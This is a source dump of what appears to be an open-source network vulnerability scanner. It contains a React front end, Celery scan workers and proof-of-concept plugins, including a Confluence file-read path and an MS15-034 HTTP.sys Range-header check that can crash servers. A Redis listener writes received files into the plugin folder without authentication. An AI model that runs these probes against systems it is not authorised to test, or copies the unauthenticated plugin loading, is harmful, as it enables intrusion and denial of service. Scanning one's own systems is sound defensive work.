├── .gitignore ├── LICENSE ├── README.md ├── app ├── App.js ├── components │ ├── AssetsTask.js │ ├── UploadPlugins.js │ ├── VulTask.js │ ├── scantask │ │ ├── CreateTask.js │ │ ├── PeriodTask.js │ │ └── TaskTips.js │ └── vultask │ │ ├── CreateTask.js │ │ ├── SearchAssets.js │ │ ├── ShowResult.js │ │ └── TaskTips.js └── index.js ├── celerynode ├── Config.py ├── __init__.py ├── api.py ├── cidr.py ├── common.py ├── redispool.py ├── subscribe.py ├── tasks.py └── vuldb │ ├── Confluence_CVE20158399.json │ ├── Docker_Remote_API_20161220120458.json │ ├── ElasticSearch_unauth.json │ ├── MS10-070.py │ ├── MS15-034.py │ ├── MS17_010.py │ ├── activemq_upload.py │ ├── axis_config_read.py │ ├── axis_info.json │ ├── crack_axis.py │ ├── crack_cisco_web.py │ ├── crack_ftp.py │ ├── crack_glassfish.py │ ├── crack_grafana.py │ ├── crack_jboss.py │ ├── crack_jboss_new.py │ ├── crack_mongo.py │ ├── crack_mssql.py │ ├── crack_mysql.py │ ├── crack_postgres.py │ ├── crack_redis.py │ ├── crack_resin.py │ ├── crack_ruijie_ac_web.py │ ├── crack_smb.py │ ├── crack_ssh.py │ ├── crack_weblogic.py │ ├── fastcgi_rce.py │ ├── git_index_disclosure.json │ ├── glassfish_filread.json │ ├── heartbleed_poc.py │ ├── hikvision_crackpass.py │ ├── iis_shortfile.py │ ├── iis_webdav.py │ ├── iis_webdav_rce.py │ ├── java_rmi_rce.py │ ├── jboss_head.py │ ├── jboss_info.json │ ├── jboss_rce_un.py │ ├── jenkins_CVE_2015_8103.py │ ├── jenkins_CVE_2017_1000353.py │ ├── jenkins_unauth.json │ ├── jetty_refer.py │ ├── memcache_unauth.py │ ├── netgear_passwd.json │ ├── nmb │ ├── NetBIOS.py │ ├── NetBIOSProtocol.py │ ├── __init__.py │ ├── base.py │ ├── nmb_constants.py │ ├── nmb_structs.py │ └── utils.py │ ├── phpmyadmin_crackpass.py │ ├── pyasn1 │ ├── __init__.py │ ├── codec │ │ ├── __init__.py │ │ ├── ber │ │ │ ├── __init__.py │ │ │ ├── decoder.py │ │ │ ├── encoder.py │ │ │ └── eoo.py │ │ ├── cer │ │ │ ├── __init__.py │ │ │ ├── decoder.py │ │ │ └── encoder.py │ │ └── der │ │ │ ├── __init__.py │ │ │ ├── decoder.py │ │ │ 
└── encoder.py │ ├── compat │ │ ├── __init__.py │ │ ├── binary.py │ │ └── octets.py │ ├── debug.py │ ├── error.py │ └── type │ │ ├── __init__.py │ │ ├── base.py │ │ ├── char.py │ │ ├── constraint.py │ │ ├── error.py │ │ ├── namedtype.py │ │ ├── namedval.py │ │ ├── tag.py │ │ ├── tagmap.py │ │ ├── univ.py │ │ └── useful.py │ ├── resin_fileread.json │ ├── resin_fileread_1.json │ ├── resin_fileread_3.json │ ├── rsync_weak_auth.py │ ├── shiro_550.py │ ├── smb │ ├── SMBConnection.py │ ├── SMBHandler.py │ ├── SMBProtocol.py │ ├── __init__.py │ ├── base.py │ ├── ntlm.py │ ├── securityblob.py │ ├── smb2_constants.py │ ├── smb2_structs.py │ ├── smb_constants.py │ ├── smb_structs.py │ └── utils │ │ ├── U32.py │ │ ├── __init__.py │ │ ├── md4.py │ │ ├── pyDes.py │ │ └── sha256.py │ ├── st2_eval.py │ ├── svn_entries_disclosure.json │ ├── tomcat_crackpass.py │ ├── web_fileread.py │ ├── web_shellshock.py │ ├── weblogic_CVE_2015_4852.py │ ├── websphere_CVE_2015_7450.py │ ├── wordpress_crackpass.py │ ├── zabbix_jsrpc_SQL.json │ ├── zabbix_latest_sql.py │ └── zookeeper_unauth_access.py ├── package.json ├── server ├── Config.py ├── Index.py ├── Routes.py ├── __init__.py ├── common.py ├── es.py ├── esinit.py ├── lib │ ├── Login.py │ └── __init__.py ├── monitor │ ├── index.py │ └── verify.py ├── redispool.py ├── run.py ├── static │ ├── css │ │ ├── bootstrap.min.css │ │ └── index.css │ ├── fonts │ │ ├── glyphicons-halflings-regular.eot │ │ ├── glyphicons-halflings-regular.svg │ │ ├── glyphicons-halflings-regular.ttf │ │ └── glyphicons-halflings-regular.woff │ ├── images │ │ └── wind.jpeg │ └── js │ │ ├── bundle-login.js │ │ ├── common.js │ │ └── index.js ├── templates │ ├── error.html │ ├── index.html │ └── login.html └── vulscan │ ├── __init__.py │ ├── vulScan.py │ └── vuldb │ ├── Confluence_CVE20158399.json │ ├── Docker_Remote_API_20161220120458.json │ ├── ElasticSearch_unauth.json │ ├── MS10-070.py │ ├── MS15-034.py │ ├── MS17_010.py │ ├── __init__.py │ ├── activemq_upload.py │ ├── 
axis_config_read.py │ ├── axis_info.json │ ├── crack_axis.py │ ├── crack_cisco_web.py │ ├── crack_ftp.py │ ├── crack_glassfish.py │ ├── crack_grafana.py │ ├── crack_jboss.py │ ├── crack_jboss_new.py │ ├── crack_mongo.py │ ├── crack_mssql.py │ ├── crack_mysql.py │ ├── crack_postgres.py │ ├── crack_redis.py │ ├── crack_resin.py │ ├── crack_ruijie_ac_web.py │ ├── crack_smb.py │ ├── crack_ssh.py │ ├── crack_weblogic.py │ ├── fastcgi_rce.py │ ├── git_index_disclosure.json │ ├── glassfish_filread.json │ ├── heartbleed_poc.py │ ├── hikvision_crackpass.py │ ├── iis_shortfile.py │ ├── iis_webdav.py │ ├── iis_webdav_rce.py │ ├── java_rmi_rce.py │ ├── jboss_head.py │ ├── jboss_info.json │ ├── jboss_rce_un.py │ ├── jenkins_CVE_2015_8103.py │ ├── jenkins_CVE_2017_1000353.py │ ├── jenkins_unauth.json │ ├── jetty_refer.py │ ├── memcache_unauth.py │ ├── netgear_passwd.json │ ├── nmb │ ├── NetBIOS.py │ ├── NetBIOSProtocol.py │ ├── __init__.py │ ├── base.py │ ├── nmb_constants.py │ ├── nmb_structs.py │ └── utils.py │ ├── phpmyadmin_crackpass.py │ ├── pyasn1 │ ├── __init__.py │ ├── codec │ │ ├── __init__.py │ │ ├── ber │ │ │ ├── __init__.py │ │ │ ├── decoder.py │ │ │ ├── encoder.py │ │ │ └── eoo.py │ │ ├── cer │ │ │ ├── __init__.py │ │ │ ├── decoder.py │ │ │ └── encoder.py │ │ └── der │ │ │ ├── __init__.py │ │ │ ├── decoder.py │ │ │ └── encoder.py │ ├── compat │ │ ├── __init__.py │ │ ├── binary.py │ │ └── octets.py │ ├── debug.py │ ├── error.py │ └── type │ │ ├── __init__.py │ │ ├── base.py │ │ ├── char.py │ │ ├── constraint.py │ │ ├── error.py │ │ ├── namedtype.py │ │ ├── namedval.py │ │ ├── tag.py │ │ ├── tagmap.py │ │ ├── univ.py │ │ └── useful.py │ ├── resin_fileread.json │ ├── resin_fileread_1.json │ ├── resin_fileread_3.json │ ├── rsync_weak_auth.py │ ├── shiro_550.py │ ├── smb │ ├── SMBConnection.py │ ├── SMBHandler.py │ ├── SMBProtocol.py │ ├── __init__.py │ ├── base.py │ ├── ntlm.py │ ├── securityblob.py │ ├── smb2_constants.py │ ├── smb2_structs.py │ ├── smb_constants.py │ 
├── smb_structs.py │ └── utils │ │ ├── U32.py │ │ ├── __init__.py │ │ ├── md4.py │ │ ├── pyDes.py │ │ └── sha256.py │ ├── st2_eval.py │ ├── svn_entries_disclosure.json │ ├── tomcat_crackpass.py │ ├── web_fileread.py │ ├── web_shellshock.py │ ├── weblogic_CVE_2015_4852.py │ ├── websphere_CVE_2015_7450.py │ ├── wordpress_crackpass.py │ ├── zabbix_jsrpc_SQL.json │ ├── zabbix_latest_sql.py │ └── zookeeper_unauth_access.py └── webpack.config.js /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | wheels/ 24 | *.egg-info/ 25 | .installed.cfg 26 | *.egg 27 | 28 | # PyInstaller 29 | # Usually these files are written by a python script from a template 30 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 
31 | *.manifest 32 | *.spec 33 | 34 | # Installer logs 35 | pip-log.txt 36 | pip-delete-this-directory.txt 37 | 38 | # Unit test / coverage reports 39 | htmlcov/ 40 | .tox/ 41 | .coverage 42 | .coverage.* 43 | .cache 44 | nosetests.xml 45 | coverage.xml 46 | *.cover 47 | .hypothesis/ 48 | 49 | # Translations 50 | *.mo 51 | *.pot 52 | 53 | # Django stuff: 54 | *.log 55 | local_settings.py 56 | 57 | # Flask stuff: 58 | instance/ 59 | .webassets-cache 60 | 61 | # Scrapy stuff: 62 | .scrapy 63 | 64 | # Sphinx documentation 65 | docs/_build/ 66 | 67 | # PyBuilder 68 | target/ 69 | 70 | # Jupyter Notebook 71 | .ipynb_checkpoints 72 | 73 | # pyenv 74 | .python-version 75 | 76 | # celery beat schedule file 77 | celerybeat-schedule 78 | 79 | # SageMath parsed files 80 | *.sage.py 81 | 82 | # dotenv 83 | .env 84 | 85 | # virtualenv 86 | .venv 87 | venv/ 88 | ENV/ 89 | 90 | # Spyder project settings 91 | .spyderproject 92 | .spyproject 93 | 94 | # Rope project settings 95 | .ropeproject 96 | 97 | # mkdocs documentation 98 | /site 99 | 100 | # mypy 101 | .mypy_cache/ 102 | node_modules/ 103 | test/ 104 | -------------------------------------------------------------------------------- /app/App.js: -------------------------------------------------------------------------------- 1 | import React from 'react'; 2 | import { Layout, Menu, Icon, notification } from 'antd'; 3 | const { Content, Header, Footer } = Layout; 4 | import { Link } from 'react-router'; 5 | import axios from 'axios'; 6 | 7 | import UploadPlugins from './components/UploadPlugins'; 8 | 9 | class App extends React.Component{ 10 | 11 | handleClick = (e) => { 12 | if(e.key == 5){ 13 | axios.post('/loginOut') 14 | .then(function(res){ 15 | notification.open({ 16 | message: '注销成功', 17 | icon: 18 | }); 19 | }) 20 | .catch(function(err){ 21 | notification.open({ 22 | message: '注销失败', 23 | icon: 24 | }); 25 | }); 26 | } 27 | } 28 | 29 | render() { 30 | return ( 31 | 32 |
33 | 40 | 41 | 资产发现 42 | 43 | 44 | 漏洞扫描 45 | 46 | 47 | Flower 48 | 49 | 50 | Kibana 51 | 52 | 53 | 注销 54 | 55 | 56 | 57 | 58 | 59 |
60 | 61 | {this.props.children} 62 | 63 |
64 | Superhua Design ©2017 65 |
66 |
67 | ); 68 | } 69 | } 70 | 71 | export default App; -------------------------------------------------------------------------------- /app/components/AssetsTask.js: -------------------------------------------------------------------------------- 1 | import React from 'react'; 2 | import { Row, Col, Card } from 'antd'; 3 | 4 | import CreateTask from './scantask/CreateTask'; 5 | import PeriodTask from './scantask/PeriodTask'; 6 | import TaskTips from './scantask/TaskTips'; 7 | 8 | class AssetsTask extends React.Component{ 9 | render(){ 10 | return( 11 | 12 | 13 | } style={{ height:"473px" }}> 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | ) 24 | } 25 | } 26 | 27 | export default AssetsTask; -------------------------------------------------------------------------------- /app/components/UploadPlugins.js: -------------------------------------------------------------------------------- 1 | import React from 'react'; 2 | import { Upload, notification, Button, Icon } from 'antd'; 3 | 4 | class UploadPlugins extends React.Component{ 5 | render(){ 6 | const props = { 7 | name: 'file', 8 | action: '/uploadPlugins', 9 | showUploadList: false, 10 | onChange(info) { 11 | if (info.file.status === 'done') { 12 | notification.open({ 13 | message: `${info.file.name} 插件上传成功`, 14 | icon: 15 | }); 16 | } else if (info.file.status === 'error') { 17 | notification.open({ 18 | message: `${info.file.name} 插件上传失败`, 19 | icon: 20 | }); 21 | } 22 | } 23 | }; 24 | return( 25 |
26 | 27 | 30 | 31 |
32 | ) 33 | } 34 | } 35 | 36 | export default UploadPlugins; -------------------------------------------------------------------------------- /app/components/VulTask.js: -------------------------------------------------------------------------------- 1 | import React from 'react'; 2 | import { Row, Col, Card } from 'antd'; 3 | 4 | import SearchAssets from './vultask/SearchAssets'; 5 | import TaskTips from './vultask/TaskTips'; 6 | 7 | class VulTask extends React.Component{ 8 | render(){ 9 | return( 10 | 11 | 12 | } > 13 | 14 | 15 | 16 | 17 | ) 18 | } 19 | } 20 | 21 | export default VulTask; -------------------------------------------------------------------------------- /app/components/scantask/CreateTask.js: -------------------------------------------------------------------------------- 1 | import React from 'react'; 2 | import { Form, Input, Tag, Button, notification, Icon } from 'antd'; 3 | const FormItem = Form.Item; 4 | import axios from 'axios'; 5 | 6 | class CreateTask extends React.Component{ 7 | 8 | setHostScan = (scanIP) => { 9 | axios.post('/setHostScan',{ 10 | scan_hosts: scanIP 11 | }) 12 | .then(function(res){ 13 | notification.open({ 14 | message: '任务创建成功', 15 | icon: 16 | }); 17 | }) 18 | .catch(function(err){ 19 | notification.open({ 20 | message: '任务创建失败', 21 | icon: 22 | }); 23 | }); 24 | } 25 | 26 | handleSubmit = (e) => { 27 | e.preventDefault(); 28 | this.props.form.validateFields((err, values) => { 29 | this.setHostScan(values.scanAssets); 30 | }); 31 | } 32 | 33 | render(){ 34 | const { getFieldDecorator } = this.props.form; 35 | const formItemLayout = { 36 | labelCol: { span: 0 }, 37 | wrapperCol: { span: 24 }, 38 | }; 39 | return( 40 |
41 | 45 | {getFieldDecorator('scanAssets')( 46 | 47 | )} 48 | 49 | 52 | 53 | 54 |
55 | ) 56 | } 57 | } 58 | 59 | CreateTask = Form.create({})(CreateTask); 60 | export default CreateTask; -------------------------------------------------------------------------------- /app/components/scantask/TaskTips.js: -------------------------------------------------------------------------------- 1 | import React from 'react'; 2 | import { Popover, Button } from 'antd'; 3 | 4 | class TaskTips extends React.Component{ 5 | render(){ 6 | 7 | let content = ( 8 |
9 | 资产发现
10 | 单次扫描
11 | 192.168.1.1-192.168.1.255
12 | 使用master队列扫描(默认)
13 | 192.168.1.1-192.168.1.255|celery
14 | 使用celery队列扫描

15 | 16 | 配置项:
17 | 周期验证配置:周期扫描IP
18 | 验证周期:天|小时,如5|16,即每5天16点进行扫描。

19 |
20 | ); 21 | 22 | return( 23 | 24 | 25 | 26 | ) 27 | } 28 | } 29 | 30 | export default TaskTips; -------------------------------------------------------------------------------- /app/components/vultask/ShowResult.js: -------------------------------------------------------------------------------- 1 | import React from 'react'; 2 | import { Modal, Button, Table } from 'antd'; 3 | 4 | const columns = [{ 5 | title: 'Host', 6 | dataIndex: 'host', 7 | width: 150, 8 | }, { 9 | title: 'Port', 10 | dataIndex: 'port', 11 | width: 150, 12 | }, { 13 | title: 'Server', 14 | dataIndex: 'server', 15 | }]; 16 | 17 | class ShowResult extends React.Component{ 18 | constructor(props){ 19 | super(props); 20 | 21 | this.state = { 22 | visible: false 23 | } 24 | } 25 | 26 | showModal = () => { 27 | this.setState({ visible: true }); 28 | } 29 | 30 | handleCancel = () => { 31 | this.setState({ visible: false }); 32 | } 33 | 34 | render() { 35 | const { visible } = this.state; 36 | const { searchResult } = this.props; 37 | const data = []; 38 | searchResult.map( (v, index) => { 39 | data.push({ 40 | key: index, 41 | host: v.host, 42 | port: v.port, 43 | server: v.server 44 | }); 45 | }); 46 | 47 | return ( 48 |
49 | 52 | 59 | 65 | 66 | 67 | ) 68 | } 69 | } 70 | 71 | export default ShowResult; -------------------------------------------------------------------------------- /app/components/vultask/TaskTips.js: -------------------------------------------------------------------------------- 1 | import React from 'react'; 2 | import { Popover, Button } from 'antd'; 3 | 4 | class TaskTips extends React.Component{ 5 | render(){ 6 | let content = ( 7 |
8 | 搜索规则
9 | 主机,host:192.168.1.1
10 | 端口,port:80
11 | 代码语言,codes:php
12 | 服务,server:apache
13 | CMS,cms:discuz!

14 | 组合查询使用 ";"
15 | eg:
16 | host:192.168.1.1;port:80
17 |
18 | ); 19 | 20 | return( 21 | 22 | 23 | 24 | ) 25 | } 26 | } 27 | 28 | export default TaskTips; -------------------------------------------------------------------------------- /app/index.js: -------------------------------------------------------------------------------- 1 | import React from 'react'; 2 | import ReactDOM from 'react-dom'; 3 | import { Router, Route, hashHistory, IndexRoute } from 'react-router'; 4 | 5 | import App from './App'; 6 | 7 | import AssetsTask from './components/AssetsTask'; 8 | import VulTask from './components/VulTask'; 9 | 10 | const routes = 11 | 12 | 13 | 14 | ; 15 | 16 | ReactDOM.render( 17 | 18 | {routes} 19 | , 20 | document.getElementById('root') 21 | ); -------------------------------------------------------------------------------- /celerynode/Config.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | # Redis配置 3 | class RedisConfig(object): 4 | HOST = "localhost" 5 | PORT = 6379 6 | PASSWORD = "" 7 | BR = 1 8 | HOSTSCANKEY = "hostScan" 9 | VULTASKKEY = "vulTask" 10 | 11 | # Celery配置 12 | class CeleryConfig(RedisConfig): 13 | BROKER_URL = "redis://:{0}@{1}:{2}/{3}".format(RedisConfig.PASSWORD, RedisConfig.HOST, RedisConfig.PORT, RedisConfig.BR) 14 | CELERY_TASK_SERIALIZER = "json" 15 | CELERY_TIMEZONE = "Asia/Shanghai" 16 | -------------------------------------------------------------------------------- /celerynode/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/superhuahua/xunfengES/427ec1d56b602e6eebe24c51502a23628e5ca5e8/celerynode/__init__.py -------------------------------------------------------------------------------- /celerynode/api.py: -------------------------------------------------------------------------------- 1 | import urllib2 2 | 3 | from tasks import hostScan, hostVerify, vulPocCheck, vulScriptCheck 4 | from common import get_ip_list 5 | 6 | def api_hostScan(hostsList, 
ports, arguments='-Pn -sV', queue="master"): 7 | """ 8 | hosts: 192.168.1.1-192.168.1.128,192.168.1.129-192.168.1.130 9 | arguments: -Pn -sV 10 | """ 11 | hostsList = hostsList.split(",") 12 | for hostsQ in hostsList: 13 | if hostsQ.find("|") != -1: 14 | hosts, queue = hostsQ.split("|") 15 | else: 16 | hosts, queue = (hostsQ, "master") 17 | ipList = get_ip_list(hosts) 18 | for v in ipList: 19 | hostScan.apply_async(args=[v, ports, arguments, queue], queue=queue) 20 | return True 21 | 22 | def api_hostVerify(host, port, queue="master"): 23 | """ 24 | host: 192.168.1.1 25 | port: 80 26 | """ 27 | hostVerify.apply_async(args=[host, port, queue], queue=queue) 28 | return True 29 | 30 | def api_vulPoc(task_id, task_name, netloc, pluginInfo): 31 | # .json payload 32 | # for v in netlocList 33 | for item_netloc in netloc: 34 | vulPocCheck.apply_async(args=[task_id, task_name, item_netloc, pluginInfo, item_netloc["queue"]], queue=item_netloc["queue"]) 35 | 36 | def api_vulScript(task_id, task_name, netloc, pfileName, passDic): 37 | #.py scripts 38 | # for v in netlocList 39 | for item_netloc in netloc: 40 | vulScriptCheck.apply_async(args=[task_id, task_name, item_netloc, pfileName, passDic, item_netloc["queue"]], queue=item_netloc["queue"]) -------------------------------------------------------------------------------- /celerynode/cidr.py: -------------------------------------------------------------------------------- 1 | def stringxor(str1, str2): 2 | orxstr = "" 3 | for i in range(0, len(str1)): 4 | rst = int(str1[i]) & int(str2[i]) 5 | orxstr = orxstr + str(rst) 6 | return orxstr 7 | 8 | def bin2dec(string_num): 9 | return str(int(string_num, 2)) 10 | 11 | def getip(ip, type): 12 | result = '' 13 | for i in range(4): 14 | item = bin2dec(ip[0:8]) 15 | if i == 3: 16 | if type == 0: 17 | item = str(int(item) + 1) 18 | else: 19 | item = str(int(item) - 1) 20 | result = result + item + '.' 
21 | ip = ip[8:] 22 | return result.strip('.') 23 | 24 | def CIDR(input): 25 | try: 26 | ip = input.split('/')[0] 27 | pos = int(input.split('/')[1]) 28 | ipstr = '' 29 | for i in ip.split('.'): 30 | ipstr = ipstr + bin(int(i)).replace('0b', '').zfill(8) 31 | pstr = '1' * pos + '0' * (32 - pos) 32 | res = stringxor(ipstr, pstr) 33 | _ip = getip(res, 0), getip(res[0:pos] + '1' * (32 - pos), 1) 34 | return _ip[0] + "-" + _ip[1] 35 | except: 36 | return None 37 | -------------------------------------------------------------------------------- /celerynode/common.py: -------------------------------------------------------------------------------- 1 | import hashlib 2 | import re 3 | import urllib2 4 | 5 | def get_ip_list(ip): 6 | #hosts = "10.151.136.0/24" CIDR 7 | #hosts = "10.151.136.0-10.151.136.10" 8 | ip_list_tmp = [] 9 | iptonum = lambda x: sum([256 ** j * int(i) for j, i in enumerate(x.split('.')[::-1])]) 10 | numtoip = lambda x: '.'.join([str(x / (256 ** i) % 256) for i in range(3, -1, -1)]) 11 | if '-' in ip: 12 | ip_range = ip.split('-') 13 | ip_start = long(iptonum(ip_range[0])) 14 | ip_end = long(iptonum(ip_range[1])) 15 | ip_count = ip_end - ip_start 16 | if ip_count >= 0 and ip_count <= 655360: 17 | for ip_num in range(ip_start, ip_end + 1): 18 | ip_list_tmp.append(numtoip(ip_num)) 19 | else: 20 | print '-h wrong format' 21 | else: 22 | ip_split = ip.split('.') 23 | net = len(ip_split) 24 | if net == 2: 25 | for b in range(1, 255): 26 | for c in range(1, 255): 27 | ip = "%s.%s.%d.%d" % (ip_split[0], ip_split[1], b, c) 28 | ip_list_tmp.append(ip) 29 | elif net == 3: 30 | for c in range(1, 255): 31 | ip = "%s.%s.%s.%d" % (ip_split[0], ip_split[1], ip_split[2], c) 32 | ip_list_tmp.append(ip) 33 | elif net == 4: 34 | ip_list_tmp.append(ip) 35 | else: 36 | print "-h wrong format" 37 | return ip_list_tmp 38 | 39 | def get_id_md5(host, port): 40 | h = hashlib.md5() 41 | h.update("{0}:{1}".format(host, port)) 42 | return h.hexdigest() 43 | 44 | def 
get_code(header, html): 45 | try: 46 | m = re.search(r'| |/)', html, flags=re.I) 47 | if m: return m.group(1).replace('"', '') 48 | except: 49 | pass 50 | try: 51 | if 'Content-Type' in header: 52 | Content_Type = header['Content-Type'] 53 | m = re.search(r'.*?charset=(.*?)(;|$)', Content_Type, flags=re.I) 54 | if m: return m.group(1) 55 | except: 56 | pass 57 | 58 | #@param 59 | # task_netloc list: [host, port] 60 | # pluginInfo list: {"url":"", "method":"", "data":""} 61 | 62 | def set_request(task_netloc, pluginInfo): 63 | url = 'http://' + task_netloc[0] + ":" + str(task_netloc[1]) + pluginInfo['url'] 64 | if pluginInfo['method'] == 'GET': 65 | request = urllib2.Request(url) 66 | else: 67 | request = urllib2.Request(url, pluginInfo['data']) 68 | return request -------------------------------------------------------------------------------- /celerynode/redispool.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import os 3 | import redis 4 | from Config import RedisConfig 5 | 6 | def getPoolBR(): 7 | try: 8 | poolBR = redis.ConnectionPool(host=RedisConfig.HOST, port=RedisConfig.PORT, password=RedisConfig.PASSWORD, db=RedisConfig.BR) 9 | return redis.Redis(connection_pool=poolBR) 10 | except Exception as e: 11 | print 'redis connect error' 12 | return 'None' 13 | 14 | def getStrictRedis(): 15 | try: 16 | r = redis.StrictRedis(host=RedisConfig.HOST, port=RedisConfig.PORT, password=RedisConfig.PASSWORD, db=RedisConfig.BR) 17 | return r 18 | except Exception as e: 19 | print 'redis connect error' 20 | return 'None' -------------------------------------------------------------------------------- /celerynode/subscribe.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import time 3 | import json 4 | import os 5 | import sys 6 | from redispool import getStrictRedis 7 | reload(sys) 8 | sys.setdefaultencoding('utf-8') 9 | 10 | FILE_PATH = 
os.path.split(os.path.realpath(__file__))[0] + '/vuldb/' 11 | 12 | if __name__ == '__main__': 13 | r = getStrictRedis() 14 | p = r.pubsub() 15 | p.subscribe("updateplugins") 16 | while True: 17 | try: 18 | message = p.get_message() 19 | if message: 20 | m = json.loads(message["data"]) 21 | filename = m["filename"] 22 | content = m["content"] 23 | f = open(FILE_PATH + filename, "w") 24 | f.write(content) 25 | f.close() 26 | time.sleep(10) 27 | except Exception as e: 28 | pass 29 | -------------------------------------------------------------------------------- /celerynode/vuldb/Confluence_CVE20158399.json: -------------------------------------------------------------------------------- 1 | {"info": "CVE-2015-8399\uff0cAtlassian Confluence 5.8.17\u4e4b\u524d\u7248\u672c\u4e2d\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u5217\u4e3e\u8bfb\u53d6\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u5217\u4e3e\u8bfb\u53d6\u670d\u52a1\u5668\u4e0a\u7684\u6587\u4ef6\u3002", "source": 0, "name": "Confluence\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6", "keyword": "banner:Atlassian Confluence", "level": "\u9ad8\u5371", "url": "https://www.exploit-db.com/exploits/39170/", "author": "wolf@YSRC", "type": "\u6587\u4ef6\u8bfb\u53d6", "plugin": {"url": "/spaces/viewdefaultdecorator.action?decoratorName=/", "tag": "\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6\u6f0f\u6d1e", "analyzing": "keyword", "analyzingdata": "log4j.properties", "data": "", "method": "GET"}} -------------------------------------------------------------------------------- /celerynode/vuldb/Docker_Remote_API_20161220120458.json: -------------------------------------------------------------------------------- 1 | { 2 | "info": "Docker Remote API未授权访问可导致代码泄露,严重可导致服务器被入侵控制。", 3 | "source": 1, 4 | "name": "Docker Remote API未授权访问", 5 | "keyword": "port:2375", 6 | "level": "高危", 7 | "url": "http://www.tuicool.com/articles/3Yv2iiY", 8 | "author": "wolf@YSRC", 9 | "type": "未授权访问", 10 | "plugin": { 11 | "url": 
"/containers/json", 12 | "tag": "Remote API 未授权访问", 13 | "analyzing": "keyword", 14 | "analyzingdata": "HostConfig", 15 | "data": "", 16 | "method": "GET" 17 | } 18 | } -------------------------------------------------------------------------------- /celerynode/vuldb/ElasticSearch_unauth.json: -------------------------------------------------------------------------------- 1 | { 2 | "name" : "ElasticSearch未授权访问", 3 | "info" : "未授权访问导致数据信息泄露,部分版本或插件存在漏洞,严重可导致服务器被入侵。", 4 | "level": "高危", 5 | "type" : "未授权访问", 6 | "author": "wolf@YSRC", 7 | "url": "", 8 | "keyword" : "server:elasticsearch", 9 | "source" : 1, 10 | "plugin" : { 11 | "url" : "/_cat", 12 | "tag" : "未授权访问", 13 | "analyzing" : "keyword", 14 | "analyzingdata" : "/_cat/master", 15 | "data" : "", 16 | "method" : "GET" 17 | } 18 | } -------------------------------------------------------------------------------- /celerynode/vuldb/MS10-070.py: -------------------------------------------------------------------------------- 1 | # coding=utf-8 2 | import base64 3 | import urllib2 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": ".NET Padding Oracle信息泄露", 8 | "info": "攻击者通过此漏洞最终可以达到任意文件读取的效果。", 9 | "level": "高危", 10 | "type": "任意文件读取", 11 | "author": "wolf@YSRC", 12 | "url": "", 13 | "keyword": "tag:aspx", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | def check(ip, port, timeout): 19 | try: 20 | url = 'http://' + ip + ":" + str(port) 21 | res_html = urllib2.urlopen(url, timeout=timeout).read() 22 | if 'WebResource.axd?d=' in res_html: 23 | error_i = 0 24 | bglen = 0 25 | for k in range(0, 255): 26 | IV = "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + chr(k) 27 | bgstr = 'A' * 21 + '1' 28 | enstr = base64.b64encode(IV).replace('=', '').replace('/', '-').replace('+', '-') 29 | exp_url = "%s/WebResource.axd?d=%s" % (url, enstr + bgstr) 30 | try: 31 | request = urllib2.Request(exp_url) 32 | res = urllib2.urlopen(request, timeout=timeout) 33 | res_html = res.read() 34 | 
res_code = res.code 35 | except urllib2.HTTPError, e: 36 | res_html = e.read() 37 | res_code = e.code 38 | except urllib2.URLError, e: 39 | error_i += 1 40 | if error_i >= 3: return 41 | except: 42 | return 43 | if int(res_code) == 200 or int(res_code) == 500: 44 | if k == 0: 45 | bgcode = int(res_code) 46 | bglen = len(res_html) 47 | else: 48 | necode = int(res_code) 49 | if (bgcode != necode) or (bglen != len(res_html)): 50 | return u'MS10-070 ASP.NET Padding Oracle信息泄露漏洞' 51 | else: 52 | return 53 | except Exception, e: 54 | pass 55 | -------------------------------------------------------------------------------- /celerynode/vuldb/MS15-034.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import socket 3 | 4 | 5 | def get_plugin_info(): 6 | plugin_info = { 7 | "name": "HTTP.sys 远程代码执行", 8 | "info": "MS15-034 HTTP.sys 远程代码执行(CVE-2015-1635),但目前仅能作为DOS攻击", 9 | "level": "中危", 10 | "type": "DOS", 11 | "author": "wolf@YSRC", 12 | "url": "https://www.secpulse.com/archives/6009.html", 13 | "keyword": "tag:iis", 14 | "source": 1 15 | } 16 | return plugin_info 17 | 18 | 19 | def check(ip, port, timeout): 20 | try: 21 | socket.setdefaulttimeout(timeout) 22 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 23 | s.connect((ip, int(port))) 24 | flag = "GET / HTTP/1.0\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n" 25 | s.send(flag) 26 | data = s.recv(1024) 27 | s.close() 28 | if 'Requested Range Not Satisfiable' in data: 29 | return u"存在HTTP.sys远程代码执行漏洞" 30 | except: 31 | pass 32 | -------------------------------------------------------------------------------- /celerynode/vuldb/activemq_upload.py: -------------------------------------------------------------------------------- 1 | # coding:utf-8 2 | import socket 3 | import time 4 | import urllib2 5 | import random 6 | 7 | def get_plugin_info(): 8 | plugin_info = { 9 | "name": "ActiveMQ unauthenticated RCE", 10 | "info": 
